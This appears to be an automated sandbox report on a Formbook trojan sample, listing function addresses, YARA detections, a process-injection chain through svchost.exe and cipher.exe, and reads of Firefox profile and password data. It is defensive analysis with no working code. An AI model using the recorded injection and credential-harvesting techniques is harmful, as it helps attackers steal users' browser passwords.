Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F32FC8 2_2_02F32FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBEFA0 2_2_02FBEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB4F40 2_2_02FB4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F60F30 2_2_02F60F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE2F30 2_2_02FE2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F82F28 2_2_02F82F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30CF2 2_2_02F30CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0CB5 2_2_02FE0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40C00 2_2_02F40C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3ADE0 2_2_02F3ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F58DBF 2_2_02F58DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDCD1F 2_2_02FDCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4AD00 2_2_02F4AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE12ED 2_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5B2C0 2_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F452A0 2_2_02F452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F8739A 2_2_02F8739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2D34C 2_2_02F2D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF132D 2_2_02FF132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF70E9 2_2_02FF70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFF0E0 2_2_02FFF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEF0CC 2_2_02FEF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F470C0 2_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300B16B 2_2_0300B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4B1B0 2_2_02F4B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2F172 2_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F7516C 2_2_02F7516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF16CC 2_2_02FF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F85630 2_2_02F85630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFF7B0 2_2_02FFF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F31460 2_2_02F31460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFF43F 2_2_02FFF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030095C3 2_2_030095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDD5B0 2_2_02FDD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF7571 2_2_02FF7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEDAC6 2_2_02FEDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDDAAC 2_2_02FDDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F85AA0 2_2_02F85AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE1AA3 2_2_02FE1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB3A6C 2_2_02FB3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFFA49 2_2_02FFFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF7A46 2_2_02FF7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB5BF0 2_2_02FB5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F7DBF9 2_2_02F7DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5FB80 2_2_02F5FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFFB76 2_2_02FFFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F438E0 2_2_02F438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAD800 2_2_02FAD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F49950 2_2_02F49950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5B950 2_2_02F5B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD5910 2_2_02FD5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F49EB0 2_2_02F49EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F03FD2 2_2_02F03FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F03FD5 2_2_02F03FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFFFB1 2_2_02FFFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F41F92 2_2_02F41F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFFF09 2_2_02FFFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFFCF2 2_2_02FFFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB9C32 2_2_02FB9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5FDC0 2_2_02F5FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF7D73 2_2_02FF7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF1D5A 2_2_02FF1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F43D40 2_2_02F43D40
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05370535 4_2_05370535
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05430591 4_2_05430591
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05422446 4_2_05422446
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05414420 4_2_05414420
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0541E4F6 4_2_0541E4F6
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05370770 4_2_05370770
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05394750 4_2_05394750
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0536C7C0 4_2_0536C7C0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0538C6E0 4_2_0538C6E0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05360100 4_2_05360100
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0540A118 4_2_0540A118
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053F8158 4_2_053F8158
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_054281CC 4_2_054281CC
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_054241A2 4_2_054241A2
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_054301AA 4_2_054301AA
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05402000 4_2_05402000
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542A352 4_2_0542A352
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_054303E6 4_2_054303E6
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0537E3F0 4_2_0537E3F0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05410274 4_2_05410274
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053F02C0 4_2_053F02C0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0537AD00 4_2_0537AD00
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0540CD1F 4_2_0540CD1F
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05388DBF 4_2_05388DBF
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0536ADE0 4_2_0536ADE0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05370C00 4_2_05370C00
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05360CF2 4_2_05360CF2
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05410CB5 4_2_05410CB5
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05390F30 4_2_05390F30
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053B2F28 4_2_053B2F28
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05412F30 4_2_05412F30
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053E4F40 4_2_053E4F40
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053EEFA0 4_2_053EEFA0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0537CFE0 4_2_0537CFE0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05362FC8 4_2_05362FC8
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542EE26 4_2_0542EE26
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05370E59 4_2_05370E59
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542EEDB 4_2_0542EEDB
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05382E90 4_2_05382E90
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542CE93 4_2_0542CE93
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05386962 4_2_05386962
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053729A0 4_2_053729A0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0543A9A6 4_2_0543A9A6
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05372840 4_2_05372840
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0537A840 4_2_0537A840
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053568B8 4_2_053568B8
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0539E8F0 4_2_0539E8F0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542AB40 4_2_0542AB40
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05426BD7 4_2_05426BD7
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0536EA80 4_2_0536EA80
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05427571 4_2_05427571
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_054395C3 4_2_054395C3
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0540D5B0 4_2_0540D5B0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05361460 4_2_05361460
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542F43F 4_2_0542F43F
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542F7B0 4_2_0542F7B0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053B5630 4_2_053B5630
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_054216CC 4_2_054216CC
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0543B16B 4_2_0543B16B
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0535F172 4_2_0535F172
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053A516C 4_2_053A516C
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0537B1B0 4_2_0537B1B0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0541F0CC 4_2_0541F0CC
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542F0E0 4_2_0542F0E0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_054270E9 4_2_054270E9
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053770C0 4_2_053770C0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542132D 4_2_0542132D
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0535D34C 4_2_0535D34C
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053B739A 4_2_053B739A
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053752A0 4_2_053752A0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_054112ED 4_2_054112ED
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0538B2C0 4_2_0538B2C0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05421D5A 4_2_05421D5A
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05427D73 4_2_05427D73
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05373D40 4_2_05373D40
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0538FDC0 4_2_0538FDC0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053E9C32 4_2_053E9C32
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542FCF2 4_2_0542FCF2
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542FF09 4_2_0542FF09
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05371F92 4_2_05371F92
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05333FD2 4_2_05333FD2
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05333FD5 4_2_05333FD5
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542FFB1 4_2_0542FFB1
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05379EB0 4_2_05379EB0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05405910 4_2_05405910
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05379950 4_2_05379950
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0538B950 4_2_0538B950
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053DD800 4_2_053DD800
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053738E0 4_2_053738E0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542FB76 4_2_0542FB76
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0538FB80 4_2_0538FB80
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053ADBF9 4_2_053ADBF9
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053E5BF0 4_2_053E5BF0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05427A46 4_2_05427A46
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0542FA49 4_2_0542FA49
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053E3A6C 4_2_053E3A6C
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0541DAC6 4_2_0541DAC6
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053B5AA0 4_2_053B5AA0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_05411AA3 4_2_05411AA3
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0540DAAC 4_2_0540DAAC
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032C16D0 4_2_032C16D0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032DA120 4_2_032DA120
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032BAB60 4_2_032BAB60
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032BCAE0 4_2_032BCAE0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032BC8B7 4_2_032BC8B7
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032BC8C0 4_2_032BC8C0
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032C31EC 4_2_032C31EC
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032C31F0 4_2_032C31F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02FAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02FBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02F75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02F87E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02F2B970 appears 280 times
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: String function: 00F28B40 appears 42 times
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: String function: 00F20D27 appears 70 times
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: String function: 00F07F41 appears 35 times
Source: C:\Windows\SysWOW64\cipher.exe Code function: String function: 0535B970 appears 280 times
Source: C:\Windows\SysWOW64\cipher.exe Code function: String function: 053A5130 appears 58 times
Source: C:\Windows\SysWOW64\cipher.exe Code function: String function: 053DEA12 appears 86 times
Source: C:\Windows\SysWOW64\cipher.exe Code function: String function: 053EF290 appears 105 times
Source: C:\Windows\SysWOW64\cipher.exe Code function: String function: 053B7E54 appears 111 times
Source: PI No 20000814C.exe, 00000000.00000003.2071812647.00000000042B3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PI No 20000814C.exe
Source: PI No 20000814C.exe, 00000000.00000003.2068613058.000000000440D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PI No 20000814C.exe
Source: PI No 20000814C.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@16/13
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6A2D5 GetLastError,FormatMessageW, 0_2_00F6A2D5
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F58713 AdjustTokenPrivileges,CloseHandle, 0_2_00F58713
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F58CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00F58CC3
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00F6B59E
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F7F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00F7F121
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F04FE9 FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00F04FE9
Source: C:\Users\user\Desktop\PI No 20000814C.exe File created: C:\Users\user\AppData\Local\Temp\aut81DC.tmp Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: cipher.exe, 00000004.00000002.4520210070.0000000003671000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2413736720.0000000003646000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4520210070.0000000003695000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2413833307.0000000003667000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4520210070.0000000003667000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PI No 20000814C.exe Virustotal: Detection: 41%
Source: PI No 20000814C.exe ReversingLabs: Detection: 39%
Source: unknown Process created: C:\Users\user\Desktop\PI No 20000814C.exe "C:\Users\user\Desktop\PI No 20000814C.exe"
Source: C:\Users\user\Desktop\PI No 20000814C.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI No 20000814C.exe"
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe Process created: C:\Windows\SysWOW64\cipher.exe "C:\Windows\SysWOW64\cipher.exe"
Source: C:\Windows\SysWOW64\cipher.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PI No 20000814C.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI No 20000814C.exe" Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe Process created: C:\Windows\SysWOW64\cipher.exe "C:\Windows\SysWOW64\cipher.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: efsutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: feclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: winhttp.dll Jump to behavior
